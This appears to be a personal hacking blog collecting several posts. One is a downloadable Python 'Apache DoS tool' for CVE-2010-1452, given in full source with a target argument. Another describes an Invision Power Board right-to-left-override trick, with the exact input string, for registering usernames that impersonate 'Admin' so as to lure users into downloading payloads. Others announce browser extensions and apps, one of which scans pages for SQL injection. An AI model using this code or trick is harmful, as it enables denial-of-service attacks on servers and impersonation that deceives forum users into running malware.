Sweetness and HTTPS update

Both Sweetness and the HTTPS app have been updated today. Removed in page ads on both apps and a few bug fixes.

Apache DoS tool (CVE-2010-1452)

I made a little python script to exploit the CVE-2010-1452 bug. So...here it is :)

DOWNLOAD: HERE

Source code:
apacheDoS-CVE20101452.py

import socket, getopt, sys
try:
opts, args = getopt.getopt(sys.argv[1:], "ht:")
except getopt.GetoptError, err:
print str(err)
exit()
def banner():
print "************************************************"
print "**|''''''''''''''''''''''''''''''''''''''''''|**"
print "**|Apache DoS tool |**"
print "**|By: Anarchy Angel |**"
print "**|Email: anarchy.ang31 [@] gmail |**"
print "**|http://hha.zapto.org |**"
print "**|- |**"
print "**|Usage: |**"
print "**| $ python apacheDoS-CVE20101452.py -h |**"
print "**| |**"
print "**|,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,|**"
print "************************************************"
print ""
for o, a in opts:
if o in ("-h", "--help"):
banner()
print "-h: This message."
print "-t : The target server you want to DoS"
print "i.e. user@user:~/$ python apacheDoS-CVE20101452.py -t www.target.com"
print "This script uses the CVE-2010-1452 bug to DoS apache servers."
print "More info: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1452"
exit()
elif o in ("-t", "--target"):
server = a
else:
assert False, "unhandled option"
try:
server
except NameError:
print "No mode set."
print "Try -h"
exit()
banner()
print "Starting DoS attack"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#now connect to the web server on port 80
# - the normal http port
s.connect((server, 80))
s.send("GET http://"+server+" HTTP/1.0")
print "Packets sent\nChecking servers status....."
s.close()
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
f.connect((server, 80))
print "Server not open to DoS :("
f.close()
except:
print "DoS done xD"

iPillage

iPillage is a chrome extension that scans any page you are browsing for SQL injection, Local file injection. It has useful information gathering tools like reverse DNS, hashing, and more!

DOWNLOAD: HERE
Report bugs and stuff: HERE

Sweetness beta 0.7 released

Fixed a few rendering bugs and made a few cosmetic changes as well. If you already have an older version installed, there is no need to download the update, it should get pushed to your system soon.

DOWNLOAD: HERE

Invision Power Board 0-day

IPB is open to right-to-left unicode injection which allows you to obfuscate file names, links, and more. That's not all, because you can inject RTLO while registering you can copy any user name you like! Go to any IPBoard and try to register "& #82 38;nimdA" w/o the quotes and spaces, you will see when you login it displays you as Admin! Now you can go on the forums and run wild as the Admin or any other user you like. No you don't get admin privs. or anything and if anyone looks close at a "spoofed" account its not to hard to spot, but its good for a few lulz and im sure you can get more then one n00b to dl a payload you posted as admin >:) Ok thats all i got, laters.

Plunderoid

Plunderoid is a Plunder app for Android! Search and download plundered files right from your phone!!!

Current version: 1.0

DOWNLOAD: HERE
Report bugs: HERE

Sweetness

Sweetness is a Google Chrome extension for SugarCRM to archive email from Gmail to Sugar!!

Current version: 1.3 beta
DOWNLOAD: HERE

To install just open Chrome and visit http://dealerweb.grandcare.com/Sweetness.crx
Once installed make sure you goto the options to set server address, user name and password. Thats it, a fast little download and a few second set up and your ready to start using Sweetness!

For more info and to report bugs go HERE